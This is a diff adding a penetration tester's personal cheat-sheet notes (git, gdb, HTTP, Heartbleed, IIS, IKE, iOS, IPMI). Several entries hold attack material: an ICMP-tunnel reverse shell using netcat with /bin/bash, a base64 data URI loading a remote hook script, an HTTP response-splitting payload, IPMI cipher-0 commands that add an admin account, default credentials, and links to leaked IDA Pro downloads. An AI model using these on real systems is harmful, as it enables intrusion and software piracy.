+# connaître l'adresse de toutes les sections de tous les objets (librairies dynamiques comprises)
+maint info sections ALLOBJ
+
+# afficher des infos en mémoire
+x/nfu addr
+ # n => nombre d'occurences
+ # f => format : x (hexa) / i (instructions / s (string)
+ # u => unit   : b (bytes) / h (half-word) / w (word) / g (8bytes)
+
+# PASS a received signal to the debugged programm
+$ handle SIGSEGV pass
+Signal        Stop      Print   Pass to program Description
+SIGSEGV       Yes       Yes     Yes             Segmentation fault
+
diff --git a/Cheat Sheet/gef b/Cheat Sheet/gef
new file mode 100644
index 0000000..e16ceeb
--- /dev/null
+++ b/Cheat Sheet/gef	
@@ -0,0 +1,14 @@
+# gef
+https://gef.readthedocs.io/en/latest/
+https://azeria-labs.com/debugging-with-gdb-introduction/
+
+entry-break
+vmmap (mprotect to change +x stack)
+
+gef config context.nb_lines_stack 15
+
+# context in separate pane
+gef> !tmux split-w h "tty; cat"
+gef> gef config context.clear_screen 1
+gef> gef config context.show_registers_raw 0
+gef> gef config context.redirect /dev/pts/14
diff --git a/Cheat Sheet/git b/Cheat Sheet/git
new file mode 100644
index 0000000..67f84ad
--- /dev/null
+++ b/Cheat Sheet/git	
@@ -0,0 +1,194 @@
+# git
+
+# crash course
+https://www.atlassian.com/git/tutorial/
+
+git diff --cached # show only changes not yet added to the index
+
+git log --oneline
+git log --stat --summary
+git log -p # see complete diff at each step
+git log --author="<pattern>"
+git log --grep="<pattern>"
+git log <file>
+git log --graph --decorate --oneline
+git log 3157e..5ab91
+git log 3157e~1
+git log HEAD~3
+git reflog
+
+git checkout a138fb5 hello.py # see version from old commit
+git checkout HEAD hello.py # and back to recent version
+
+git branch -a # to list all existing branches, including remote branches, and see active one
+git checkout -b 1.3-stable origin/1.3-stable # create branch '1.3-stable' as a local copy of the remote branch 'origin/1.3-stable' and switch to it (to use a different branch than the default selected (master) then you need to create a local copy of the remote branch)
+
+git checkout master # back to master branch
+git merge hotfix # merge another branch
+git checkout new-feature
+git rebase master # always to do a fast-forward merge instead of a 3-way merge to keep a linear history (and no merge commit)
+git checkout master
+git merge new-feature # merge changes of new-feature into master
+git diff # to show conflicts
+git commit -a # commit result of merged conflicts
+
+git branch -d new-feature # to delete merged branch which is now useless
+git branch -D crazy-idea # if branch were not merged
+
+git branch -r # list remote branches
+
+gitk, qgit, tig # GUIs
+gitk HEAD..FETCH_HEAD  # visualize what bob did since his fork
+gitk HEAD...FETCH_HEAD # visualize what both of them did since they forked
+
+pull = fetch + merge + commit and always merges into the current branch
+
+git pull <remote> == git fetch <remote>; git merge origin/<current-branch>
+
+git checkout master
+git pull --rebase origin # keel local changes onto the top of what everybody else has already contributed
+
+git tag v2.5 1b2ae37b
+git push <remote> --tags # sends all local tags to remote repo
+
+git revert HEAD # revert the most recent commit
+
+revert: the safe way, reset: the dangerous way & permanent undo
+git reset # unstages all files without overwriting any changes
+git reset --hard # reset the staging area and the working directory to match the most recent commit
+git reset --hard <commit> # obliterates all commits after <commit>
+git reset --hard HEAD~2 # remove last 2 commits
+NB. never do reset on published commits
+
+git clean # removes untracked files from working directory
+
+git grep "hello" v2.5
+
+# delete last commit (assuming i am sitting on that commit)
+# warning you will loose your changes
+git reset --hard HEAD~1 or git reset --hard <sha1-commit-id>
+
+# forgot to add files or to make changes to files in commit?
+git add ./path/to/file
+git commit -a --amend -C HEAD
+
+# edit last commit message
+git commit --amend
+
+# undo last push
+git push -f origin HEAD^:master
+
+# google code new empty git project "Everything up-to-date" FAQ "If the remote repository is empty, nothing will be pushed, so you should explicitly specify a branch to push"
+git push origin master 
+
+# http://stackoverflow.com/questions/6406762/why-am-i-merging-remote-tracking-branch-origin-develop-into-develop
+do not use git pull --rebase, do below instead:
+* download the latest commits
+git remote update -p
+* update the local branch
+git merge --ff-only @{u}
+* if the above fails with a complaint that the local branch has diverged:
+git rebase -p @{u}
+
+or just create an alias: git config --global alias.up '!git remote update -p; git merge --ff-only @{u}' and then just do: git up
+
+# fork a project on github (https://gist.github.com/blackfalcon/8428401)
+click fork on web gui
+git clone
+git remote add upstream https://github.com/fixme/fixme.git
+git checkout -b blah master
+
+- sync the fork
+git fetch upstream
+git checkout master # checkout my fork's local master branch
+git merge upstream/master
+
+- create branch and push changes
+git checkout -b mynewfeat master
+git commit -m blah core.py
+git push origin mynewfeat
+
+- keep forked repo synced with main repo
+git checkout master
+git fetch upstream
+git rebase upstream/master
+git status # your branch is ahead of 'origin/master' with n commits
+git push origin master
+
+- once pull request merged
+git branch -d mynewfeat # delete branch from local repo
+git push origin --delete mynewfeat # delete branch from remote repo as well (optional)
+
+# master/develop/branches (newfeats/bugfixes/releases) http://nvie.com/posts/a-successful-git-branching-model/
+* new feature
+1. create branch
+git checkout -b newfeat develop
+
+2. incorporate feature on develop
+git checkout develop
+git merge --no-ff myfeat
+git branch -d myfeat
+git push origin develop
+
+3. create a release branch
+git checkout -b release-1.2 develop
+change version number
+git commit -a -m 'New release 1.2'
+
+4. finishing a release branch
+git checkout master
+git merge --no-ff release-1.2
+git tag -a 1.2
+git checkout develop
+git merge --no-ff release-1.2
+git branch -d release-1.2
+
+* new hotfix
+git checkout -b hotfix-1.2.1 master
+change version number
+git commit -a -m 'New bugfix version 1.2.1'
+fix bug
+git commit -m 'Fixed blah bug'
+
+git checkout master
+git merge --no-ff hotfix-1.2.1
+git tag -a 1.2.1
+
+git checkout develop
+git merge --no-ff hotfix-1.2.1
+
+git branch -d hotfix-1.2.1
+
+# stash
+git stash list
+git stash apply stash@{2}
+git stash show
+
+# making changes to pull request
+git fecth https://github.com/asolino/patator master
+git checkout FETCH_HEAD
+make changes
+git add patator.py
+git commit -a
+git checkout master
+git merge <commitid of my commit above>
+git push
+
+# rip .git
+http://www.slideshare.net/kost/ripping-web-accessible-git-files
+tools/exploit/dvcs-rippers
+
+# skiddit
+git checkout -b release-0.3 master
+change version number
+git commit -a -m 'New release 0.3'
+git checkout master
+git merge --no-ff release-0.3
+git tag -a 0.3
+enter release-0.3
+git branch -d release-0.3
+git push origin --tags
+git push
+
+# cat all objects to grep for flag
+for i in .git/objects/*/*; do j=${i#.git/objects/}; j=$(echo $j | tr -d /); echo $j; git cat-file -p $j; done | grep flag
diff --git a/Cheat Sheet/glassfish b/Cheat Sheet/glassfish
new file mode 100644
index 0000000..6ff8862
--- /dev/null
+++ b/Cheat Sheet/glassfish	
@@ -0,0 +1,7 @@
+# glassfish
+
+# start default domain
+./bin/asadmin start-domain
+
+# start database
+./bin/asadmin start-database
diff --git a/Cheat Sheet/go b/Cheat Sheet/go
new file mode 100644
index 0000000..39e726b
--- /dev/null
+++ b/Cheat Sheet/go	
@@ -0,0 +1,4 @@
+# go
+
+# simple rce via arbitrary write on Go < 1.1 (before non-executable heap and stack)
+http://codearcana.com/posts/2013/04/23/exploiting-a-go-binary.html
diff --git a/Cheat Sheet/googlehacking b/Cheat Sheet/googlehacking
new file mode 100644
index 0000000..e74c685
--- /dev/null
+++ b/Cheat Sheet/googlehacking	
@@ -0,0 +1,11 @@
+# google hacking
+
+"this file was generated by nessus"
+"vnc desktop" inurl:5800
+filetype:pwd service <-- frontpage
+filetype:bak inurl:"htaccess|passwd|shadow|htusers"
+allunurl:tsweb/default.htm <-- remote desktop web connection exposed
+
+sitedigger (foundstone) , athena (snakeoillabs), wikto (sensepost)
+bref outil pour check ghdb et bhdb avec un domaine cible
+
diff --git a/Cheat Sheet/gpg b/Cheat Sheet/gpg
new file mode 100644
index 0000000..aea676a
--- /dev/null
+++ b/Cheat Sheet/gpg	
@@ -0,0 +1,6 @@
+# gpg
+
+gpg --keyserver pool.sks-keyservers.net --recv-keys 9B65F087
+gpg --keyserver subkeys.pgp.net --recv-keys 9B65F087
+gpg --keyserver pgp.mit.edu --recv-keys 9B65F087
+
diff --git a/Cheat Sheet/gwt b/Cheat Sheet/gwt
new file mode 100644
index 0000000..b75ec54
--- /dev/null
+++ b/Cheat Sheet/gwt	
@@ -0,0 +1,3 @@
+# google web toolkit - gwt
+
+http://srcincite.io/blog/2017/05/22/from-serialized-to-shell-auditing-google-web-toolkit-with-el-injection.html
diff --git a/Cheat Sheet/hackers b/Cheat Sheet/hackers
new file mode 100644
index 0000000..868b8a8
--- /dev/null
+++ b/Cheat Sheet/hackers	
@@ -0,0 +1,3 @@
+# hackers
+
+famous hackers database: http://www.soldierx.com/hdb
diff --git a/Cheat Sheet/heartbleed b/Cheat Sheet/heartbleed
new file mode 100644
index 0000000..f1ec523
--- /dev/null
+++ b/Cheat Sheet/heartbleed	
@@ -0,0 +1,29 @@
+# heartbleed
+
+http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html # good writeup
+http://www.westpoint.ltd.uk/blog/2014/04/14/understanding-the-heartbleed-proof-of-concept/ # nice read
+https://www.duosecurity.com/blog/heartbleed-defense-in-depth-part-2 # timeline of ssl bugs
+
+* PoCs
+openssl s_client -connect google\.com:443 -tlsextdebug 2>&1| grep 'server extension "heartbeat" (id=15)' || echo safe # not enough to confirm if vulnerable though
+grep -l 'libssl.*deleted' /proc/*/maps | tr -cd 0-9\\n | xargs -r ps u # search for processes still using old OpenSSL vuln to heartbleed
+# this only detects whether you've disabled heartbeats. Checking for 1.0.1g without exploiting is challenging
+# also, you can be safe even if heartbeats are still enabled, if you have upgraded to 1.0.1g
+https://gist.github.com/sh1n0b1/10100394 by Jared Stafford # original PoC at http://s3.jspenguin.org/ssltest.py
+https://gist.github.com/takeshixx/10107280 (linked from https://www.mattslifebytes.com/?p=533) # PoC can dump memory to stdout and also has STARTLS support
+https://gist.github.com/mpdavis/10171593 by Michael Davis # altered to dump session IDs en masse (https://www.michael-p-davis.com/using-heartbleed-for-hijacking-user-sessions/)
+https://github.com/isgroup-srl/openmagic # with loop
+but all PoCs are pretty much based on the same code (ie. a dirty PoC sending hardcoded heartbeat request)
+https://github.com/Lekensteyn/pacemaker # attacking clients
+https://gist.github.com/epixoip/10570627 # private key 7th cloudflare
+https://github.com/musalbas/heartbleed-masstest # multiscanner
+https://gist.github.com/ah8r/10632982 by Hut3 # cardiac arrest supposedly works best (http://cryptogasm.com/2014/04/whats-worse-than-heartbleed-bugs-in-heartbleed-detection-scripts/)
+https://hacking.ventures/rsa-keys-in-heartbleed-memory/ # find RSA keys from memory dumps
+https://github.com/falstaff84/heartbleed_test_openvpn # openvpn
+https://bitbucket.org/johannestaas/heartattack # original PoC by Jared adapted by Johan Nestaas 
+https://github.com/robertdavidgraham/heartleech # can parse pcap and extract private key
+http://seclists.org/fulldisclosure/2014/Apr/109 # iptables & tshark rules
+
+* cupid (client-side)
+e.g. free wifi to make clients connect to malicious server
+
diff --git a/Cheat Sheet/http b/Cheat Sheet/http
new file mode 100644
index 0000000..cff56fc
--- /dev/null
+++ b/Cheat Sheet/http	
@@ -0,0 +1,67 @@
+# http
+
+# X-Content-Security-Policy, Strict-Transport-Security, X-Frame-Options
+http://www.dsd.gov.au/publications/csocprotect/protecting_web_apps.htm
+
+# CORS (Access-Control-Allow-Origin)
+The Same-origin policy does not prevent requests being made to other origins, but disables access to the response from JavaScript. CORS headers allow access to cross-origin responses.
+https://medium.com/statuscode/cors-a-guided-tour-4e72230a8739#.vrov01jfg pitfall: allow credentials without whitelist
+https://ejj.io/breaking-sop/
+https://ejj.io/misconfigured-cors/
+http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html
+
+Firefox prevents this (otherwise xss to exfil secrets trivial)
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Credentials: true
+
+# bypass same origin (SOP)
+use data uri like data:text/html;base64,PGh0bWw+CjxzY3JpcHQgc3JjPSAiaHR0cDovLzEwNC4xMzEuNS4xNTA6ODAwMC9ob29rLmpzIjsgIHR5cGU9ICJ0ZXh0L2phdmFzY3JpcHQiID48L3NjcmlwdD4KPC9odG1sPgo=
+
+# http://guides.rubyonrails.org/security.html
+X-Frame-Options 'SAMEORIGIN' in Rails by default - allow framing on same domain. Set it to 'DENY' to deny framing at all or 'ALLOWALL' if you want to allow framing for all website.
+X-XSS-Protection '1; mode=block' in Rails by default - use XSS Auditor and block page if XSS attack is detected. Set it to '0;' if you want to switch XSS Auditor off(useful if response contents scripts from request parameters)
+X-Content-Type-Options 'nosniff' in Rails by default - stops the browser from guessing the MIME type of a file.
+X-Content-Security-Policy A powerful mechanism for controlling which sites certain content types can be loaded from
+Access-Control-Allow-Origin Used to control which sites are allowed to bypass same origin policies and send cross-origin requests.
+Strict-Transport-Security Used to control if the browser is allowed to only access a site over a secure connection
+
+# if there's a reverse proxy removing the Server: try to send http header with invalid values like with the Expect: header
+# BigIP <-> Tomcat
+GET /blah/ HTTP/1.1
+Connection: Keep-Alive
+User-Agent: Mozilla/5.0
+Host: foobar
+Expect: 101-continue             // != 100-continue
+
+HTTP/1.1 400 Bad Request
+Server: Apache-Coyote/1.1        // would not be returned with 100-continue
+Transfer-Encoding: chunked
+Date: Wed, 03 Jul 2013 07:52:02 GMT
+X-Cnection: close
+
+# methode TRACE / TRACK
+# http://deadliestwebattacks.com/2010/05/18/cross-site-tracing-xst-the-misunderstood-vulnerability/
+$ echo -ne 'TRACE /kikool HTTP/1.1\r\nHost: 10.0.0.10\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n' | nc -n 127.0.0.1 80
+HTTP/1.1 200 OK
+Date: Tue, 16 Jul 2013 06:26:11 GMT
+Server: Apache/2.4.4 (Fedora) OpenSSL/1.0.1e-fips PHP/5.4.16
+Transfer-Encoding: chunked
+Content-Type: message/http
+
+TRACE /kikool HTTP/1.1
+Host: 10.10.220.230
+Accept: */*
+User-Agent: Mozilla/5.0
+
+# http response splitting
+language=fr%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a<html>Sorry,%20System%20Down</html>
+
+# websockets
+https://www.notsosecure.com/blog/2014/11/27/how-cross-site-websocket-hijacking-could-lead-to-full-session-compromise/
+
+# http request smuggling
+http://projects.webappsec.org/w/page/13246928/HTTP%20Request%20Smuggling
+
+# <a target=_blank https://mathiasbynens.github.io/rel-noopener/ https://css-tricks.com/use-target_blank/
+do not use target="_blank" without rel="noopener noreferrer"
+or this could get ugly esp. with <a links in user-generated content
diff --git a/Cheat Sheet/huawei-h3c b/Cheat Sheet/huawei-h3c
new file mode 100644
index 0000000..83286f2
--- /dev/null
+++ b/Cheat Sheet/huawei-h3c	
@@ -0,0 +1,8 @@
+# huawei
+
+https://pierrekim.github.io/blog/2015-10-07-Huawei-routers-vulnerable-to-multiple-threats.html
+
+# h3c
+snmp discloses username and password (reversible encryption)
+http://grutztopia.jingojango.net/2012/10/hph3c-and-huawei-snmp-weak-access-to.html
+http://blog.emaze.net/2014/01/yet-another-huawei-weak-password.html
diff --git a/Cheat Sheet/icewarp b/Cheat Sheet/icewarp
new file mode 100644
index 0000000..30a23d7
--- /dev/null
+++ b/Cheat Sheet/icewarp	
@@ -0,0 +1,3 @@
+# icewarp
+
+https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2011-013/?fid=3780
diff --git a/Cheat Sheet/icmpshells b/Cheat Sheet/icmpshells
new file mode 100644
index 0000000..38af760
--- /dev/null
+++ b/Cheat Sheet/icmpshells	
@@ -0,0 +1,48 @@
+# icmpshells
+
+# ptunnel
+tested with PingTunnel-0.72
+need to run client & server as root
+
+ptunnel depends on libpcap so if victim host does not have it, build ptunnel as static
+remember to build on a host that has the same arch as the victim's (x86 vs x86_64 etc.)
+
+tar xf libpcap-0.8.1 ; ./configure && make
+change LDOPTS = /usr/lib/libpthread.a /root/PingTunnel/libpcap-0.8.1/libpcap.a
+add -static to the ptunnel: target
+get rid of the selinux crap
+scp ptunnel victimip:
+
+* bind shell
+victim:
+./ptunnel
+
+attacker:
+./ptunnel -p victimip -lp 2222 -da 127.0.0.1 -dp 22
+ssh -p 2222 127.0.0.1
+
+* reverse shell (netcat)
+victim:
+./ptunnel -p attackerip -lp 4321 -da 127.0.0.1 -dp 1234
+nc -vn 127.0.0.1 4321 -e /bin/bash
+
+attacker:
+./ptunnel
+nc -vnlp 1234
+
+* reverse shell (ssh)
+victim:
+./ptunnel -p attackerip -lp 2222 -da 127.0.0.1 -dp 22
+ssh -p 2222 -R 1234:127.0.0.1:22 seb@127.0.0.1
+
+attacker:
+./ptunnel
+ssh -p 1234 root@127.0.0.1
+
+# icmpshell
+* bind shell with ishell v2.0
+victim:
+./ishd -t 8
+
+attacker:
+./ish -t 8 victimip
diff --git a/Cheat Sheet/ida b/Cheat Sheet/ida
new file mode 100644
index 0000000..b52819c
--- /dev/null
+++ b/Cheat Sheet/ida	
@@ -0,0 +1,27 @@
+# ida
+
+# cool plugins
+https://github.com/deresz/funcap
+https://github.com/ynvb/DIE
+https://github.com/illera88/Ponce # symbolic execution
+
+# eye friendly skins & theme
+https://github.com/zyantific/IDASkins + https://github.com/eugeii/ida-consonance (https://twitter.com/gentilkiwi/status/714536542216314880)
+
+# remote debugging with ida
+Press F9 in IDA and select "Remote Linux Debugger", then configure the process options.
+
+The next step is to copy the your linux_server binary from "dbgsrv" folder in IDA to your backtrack machine and run it:
+root@bt:~/IDA# ./linux_server
+IDA Linux 32-bit remote debug server(ST) v1.17. Hex-Rays (c) 2004-2013
+Listening on port #23946...
+
+Set any breakpoint in IDA(F2) and click on Debugger->Start Process (F9). You are ready to start debugging and with the power of IDA to document everything as you go!
+
+# leaks
+* idapronw_hexx86w_hexarmw_140604_8e881c7073422b06ad99444a1b085e32.exe
+IDA Pro 6.6 Full Leak（x64、x32、arm 、hexrays）download: http://pan.baidu.com/s/1sj9aK1n ，install password：itJpyHidszaR 
+
+* !D@P-68.rar
+IDA 6.8 likely clean (license uploaded by malware)
+pwd: !D@PR068
diff --git a/Cheat Sheet/iis b/Cheat Sheet/iis
new file mode 100644
index 0000000..cbd7ee7
--- /dev/null
+++ b/Cheat Sheet/iis	
@@ -0,0 +1,31 @@
+# iis
+
+# old school vulns
+http://blog.cassidiancybersecurity.com/post/2014/06/Android-4.4.3%2C-or-fixing-an-old-local-root
+
+# decrypt passwords stored in IIS config files
+https://www.netspi.com/blog/entryid/226/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2
+
+# webdav dir trav
+http://blog.zoller.lu/2009/05/iis-6-webdac-auth-bypass-and-data.html
+http://www.skullsecurity.org/blog/?p=285
+http://unixwiz.net/techtips/ms971492-webdav-vuln.html
+
+=> /private%c0%af/
+
+# IIS 6.x
+* CVE-2017-7269 rce in PROPFIND
+https://github.com/edwardz246003/IIS_exploit
+
+# IIS 5.x
+* hide the IIS server version from HTTP header (aka. banner)
+http://support.microsoft.com/?id=317741
+
+* disable webdav
+http://support.microsoft.com/?scid=KB;EN-US;Q241520
+
+# internal ip disclosure
+bug IIS 6.0 qui renvoie l'IP interne si Host: pas envoyé
+ou bien via Webdav
+echo -e 'PROPFIND / HTTP/1.0\nUser-Agent: Mozilla/5.0\nAccept: */*\nHost:\nContent-Type: text/xml\nContent-Length: 0\n' | ncat --ssl -vn 10.0.0.1 443
+
diff --git a/Cheat Sheet/ike b/Cheat Sheet/ike
new file mode 100644
index 0000000..c99b13b
--- /dev/null
+++ b/Cheat Sheet/ike	
@@ -0,0 +1,39 @@
+# ike
+
+# tools
+* group name enumeration
+https://github.com/SpiderLabs/groupenum
+https://github.com/SpiderLabs/ikeforce
+
+* transform set enumeration
+https://labs.portcullis.co.uk/tools/iker/
+dk_ipsecenum.sh
+
+# Tunnel Group aka Group Authentication with pre-shared-key
+http://www.cisco.com/c/en/us/support/docs/security/vpn-3000-series-concentrators/14115-vpn-3000-auth.html
+dumb reminder: the password used for Group Authentication happens before the individual auth. User auth happens on the radius server.
+expl:
+tunnel-group itadmin ipsec-attributes
+pre-shared-key cisco123
+
+# group names or ID enumeration from vulnerable Cisco devices
+* by the presence of the Dead Peer Detection
+ike-scan -M -A --id=<need to guess valid groupname> 1.2.3.4
+
+First vuln was devices would only return HASH_R when id is correct
+
+Now devices always return a HASH_R wether id is correct or not (to prevent enumeration that used to be possible but older devices would only respond to a correct ID).
+However HASH_R can only be cracked if guessed ID is correct
+
+Another group name enumeration vulnerability exists for Cisco devices
+The presence of a 'Dead Peer Detection’ (DPD) payload with an unlikely correct groupname indicates a patched ASA firewall.
+With an unpatched ASA firewall, the DPD would be missing unless the groupname is valid.
+http://blog.spiderlabs.com/2013/03/cracking-ike-aggressive-mode-hashes-part-1.html
+
+* by differing responses to IKE negotiations (number of responses, see https://www3.trustwave.com/spiderlabs/advisories/TWSL2013-004.txt)
+http://blog.spiderlabs.com/2013/04/cracking-ike-missionimprobable-part-2.html
+
+# crack psk
+ike -M -A --id=yay 1.2.3.4 -P./yay.psk
+hashcat -m 5[34]00 yay.psk
+ikescan2john.py yay.psk > yay.psk.jtr
diff --git a/Cheat Sheet/ios b/Cheat Sheet/ios
new file mode 100644
index 0000000..b91c6e3
--- /dev/null
+++ b/Cheat Sheet/ios	
@@ -0,0 +1,104 @@
+# ios
+
+https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet/
+
+# michael crickeycon
+https://www.youtube.com/watch?v=jzIj8m7VBcM
+
+https://www.owasp.org/index.php/IOS_Developer_Cheat_Sheet
+
+http://eightbit.io/
+hijack data w/out knwoing the pin (after phone is pin-unlocked, or used to do it by loading custom boot rom, get enc keys and bf, but since ios 4 hasnt been any boot rom to do that)
+expl: fake charger
+ie. it's harder but not impossible
+
+apps can read certains files outside sandbox
+
+signature (ensure integrity of app):
+to run, an app must be signed by apple or cert issued by apple
+plus runtime checks to test the integrity (ios apple security pdf + bh 2012 talk)
+
+jailbreak the device to run unsigned code
+
+obj-c
+native apps are written in obj-c
+obj-c == c + smalltalk-stule messaging and object syntax
+ojb-c is a strict superset of c
+  - cancompile c w/ obj-c compile
+  - c code can be included in obj-c code
+
+class methods and instance methods
+
+automatic reference counting (optional but enabled by default) aka. ARC
+
+instance variables == properties + accessor methods generated auto at compile time
+property can be declared as readonly, assign, copy, retain
+
+cocoa = framework and APIs, UI functionality etc.
+
+xcode is apple's IDE (free to download from appstore)
+
+* pentest env.
+ssh over usb!
+
+all ios device will run ios6 or above
+
+jailbreak:
+as a dev you should assume that your app will run on a compromised device
+
+do not update test devices
+Cydia: .deb based software repo for jailbroken devices
+iphone-tunnel: ssh over usb
+mobilesubstrate: patching code at runtime
+
+to install AppCrack: need to add root repository to Cydia 
+AppCrack sometimes doesnt work, need to retry
+wont work if app has anti-debugging protections
+
+application id is random (GUID)
+
+pasteboard
+/var/mobile/Library/Caches/com.apple.UIKit.pboard/pasteboardDB
+
+request/response cache
+Library/Caches/com.flexteam/Cache.db*
+
+logging
+here until next reboot
+
+app always 1 binary
+binary can contain more than 1 arch like (arm6 and arm7)
+
+* cyscript
+
+UIApp.keyWindow # get the main window
+UIApp.keyWindow.rootViewController
+
+search for Delegate
+
+ps aux | grep goMoney
+cycript -p <pid>
+UIApp.delegate
+*UIApp.delegate
+[UIApp.delegate informUserOfJailbrokenDevice] # triggers the pop up
+
+[login fakeSignIn] # execute the method
+
+# reverse eng toolkit
+iRET
+
+# security testing framework
+https://github.com/mwrlabs/needle
+
+# memory
+https://hexplo.it/introducing-memscan/
+
+# todo
+bh 2012 talk
+
+# hooking (cycript and substrate)
+https://www.sensepost.com/blog/2016/advanced-cycript-and-substrate/
+
+# misc
+CocoaPods is a depedency manager for Cocoa projects / used to install and manage dependencies in existing Xcode projects
+Carthage is a decentralised dependency manager for Cocoa application (i.e. alternative to CocoaPods)
diff --git a/Cheat Sheet/ip_geolocation b/Cheat Sheet/ip_geolocation
new file mode 100644
index 0000000..85afa12
--- /dev/null
+++ b/Cheat Sheet/ip_geolocation	
@@ -0,0 +1,46 @@
+# ip geolocation
+
+http://en.wikipedia.org/wiki/Geolocation_software
+super liste detaillée: http://www.caida.org/tools/utilities/netgeo/
+curl ipinfo.io/1.2.3.4
+
+* www.geoplugin.com
+quite precise, utilise MaxMind
+
+* www.wipmania.com 
+maintiennent une BDD telechargeable (sql, txt)
+
+* www.iplocationtools.com 
+maintiennent une BDD telechargeable (sql, csv)
+et "ou databases includes GeoLite data created by MaxMind"
+
+* www.countryipblocks.net 
+maintiennent des fichiers de format divers (eg. .htaccess) 
+pour faire la correspondance CC <-> netblock
+
+* www.maxmind.com 
+online demo (payant)
+dev-libs/geoip
+free databases to download from http://geolite.maxmind.com/download/geoip/database/
+version gratuite donne uniquement CC+nom_pays (pas city, etc.)
+$ geoiplookup 209.85.227.99 
+GeoIP Country Edition: US, United States
+
+API dispo pour bcp de langages: http://geolite.maxmind.com/download/geoip/api/
+
+* flagfox
+-> bdd gratuite de MaxMind embarquée dans plugin
+http://flagfox.servehttp.com/forum/viewtopic.php?f=3&t=49
+"We import the free version of their (MaxMind) country location database for use within Flagfox"
+"Flagfox uses an internal IP location database to do its lookups"
+"Each month, a new version of Flagfox is released with the new database version"
+
+* GeoTrace www.nabber.org/projects/geotrace
+traceroute + City + Country
+=> utilise DNS LOC, hostip.info, whois
+
+* GTrace
+derniere release: 11/5/99 
+
+* www.geobytes.com
+
diff --git a/Cheat Sheet/ipmi b/Cheat Sheet/ipmi
new file mode 100644
index 0000000..29d6666
--- /dev/null
+++ b/Cheat Sheet/ipmi	
@@ -0,0 +1,56 @@
+# ipmi
+
+https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi
+http://fish2.com/security/
+
+# hp Lights-Out (iLO)
+https://www.synacktiv.com//posts/exploit/rce-vulnerability-in-hp-ilo.html
+
+# gul
+* Exploiting IPMI
+https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi
+
+* Anonymous auth
+$ ipmitool -I lanplus -H <target_IP> -U '' -P '' user list
+$ ipmitool -I lanplus -H <target_IP> -U '' -P '' user set password <ID_root> <new_password>
+$ ssh root@<target_IP>
+root@<target_IP>'s password: <new_password>
+
+* Default username / password
+              Product Name                      | Default Username | Default Password
+------------------------------------------------+------------------+-------------
+HP Integrated Lights Out (iLO)                  | Administrator    | <factory randomized 8-character string>
+Dell Remote Access Card (iDRAC, DRAC)           | root             | calvin
+IBM Integrated Management Module (IMM)          | USERID           | PASSW0RD (with a zero)
+Fujitsu Integrated Remote Management Controller | admin            | admin
+Supermicro IPMI (2.0)                           | ADMIN            | ADMIN
+Oracle/Sun Integrated Lights Out Manager (ILOM) | root             | changeme
+ASUS iKVM BMC                                   | admin            | admin
+
+* Vérifier si la vulnerabilité cipher 0 est présente
+$ ipmitool -I lanplus -H <target_IP> -U Administrator -P Password1 user list
+Error: Unable to establish IPMI v2 / RMCP+ session
+Get User Access command failed (channel 14, user 1)
+
+$ ipmitool -I lanplus -C 0 -H <target_IP> -U Administrator -P Password1 user list
+ID  Name         Callin  Link Auth    IPMI Msg   Channel Priv Limit
+1   Administrator    true    false      true       ADMINISTRATOR
+2   (Empty User)     true    false      false      NO ACCESS
+
+* Ajouter un utilisateur avec les droits admins
+Ici, en utilisant le cipher 0
+
+$ ipmitool -I lanplus -C 0 -H <target_IP> -U Administrator -P Password1 user set name     <ID_Empty_User> gul
+$ ipmitool -I lanplus -C 0 -H <target_IP> -U Administrator -P Password1 user set password <ID_Empty_User> Password1
+$ ipmitool -I lanplus -C 0 -H <target_IP> -U Administrator -P Password1 user priv         <ID_Empty_User> 4
+$ ipmitool -I lanplus -C 0 -H <target_IP> -U Administrator -P Password1 user enable       <ID_Empty_User>
+
+* Metasploit modules
+auxiliary/scanner/ipmi/ipmi_cipher_zero
+Détecte si l'attaque par cipher 0 est possible
+
+auxiliary/scanner/ipmi/ipmi_dumphashes
+Demande gentillement les hashes au service :)
+
+exploit/multi/upnp/libupnp_ssdp_overflow
+Exploite la vulnerabilité "Supermicro IPMI UPnP Vulnerability"
diff --git a/Cheat Sheet/iptables b/Cheat Sheet/iptables
new file mode 100644
index 0000000..d070cb0
--- /dev/null
+++ b/Cheat Sheet/iptables	
@@ -0,0 +1,19 @@
+# iptables
+
+# liste des codes icmp
+iptables -p icmp -h
+
+# nat
+# autoriser le VM a faire du DNS et rediriger ses requetes vers 80/TCP dans
+# burp avec :
+#   - cocher support invisible
+#   - decocher loopback only
+iptables -t nat -A PREROUTING -s 192.168.56.99/32 -i vboxnet0 -p udp -m udp --dport 53 -j DNAT --to-destination 8.8.8.8
+iptables -t nat -A PREROUTING -s 192.168.56.99/32 -i vboxnet0 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8282
+iptables -t nat -A POSTROUTING -d 8.8.8.8/32 -j MASQUERADE
+
+# forward outsider to VM
+-t nat -A PREROUTING -i em1 -p tcp --dport 2222 -j DNAT --to-destination 192.168.122.48:22
+-t filter -A FORWARD -o virbr0 -d 192.168.122.0/24 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT # let through responses from internet back to VMs
+-t filter -A FORWARD -o virbr0 -d 192.168.122.48 -p tcp -m conntrack --ctstate NEW --dport 22 -j ACCEPT
+
diff --git a/Cheat Sheet/ipv6 b/Cheat Sheet/ipv6
new file mode 100644
index 0000000..6903b83
--- /dev/null
+++ b/Cheat Sheet/ipv6	
@@ -0,0 +1,21 @@
+# ipv6
+
+# disable/enable
+sysctl -w net.ipv6.conf.all.disable_ipv6=1
+
+google-public-dns-a.google.com. 83236 IN AAAA   2001:4860:4860::8888
+
+# archilnux
+/boot/grub/grub.cfg: linux /boot/vmlinuz-linux root=UUID=de6e883e-0cd4-4a0a-8f26-12360f2c3ecf ro ipv6.disable=1
+
+# ipv4 to ipv6 tunnel
+www.tunnelbroker.net (l: lanjelot@gmail.com)
+modprobe ipv6 (module may be built in kernel)
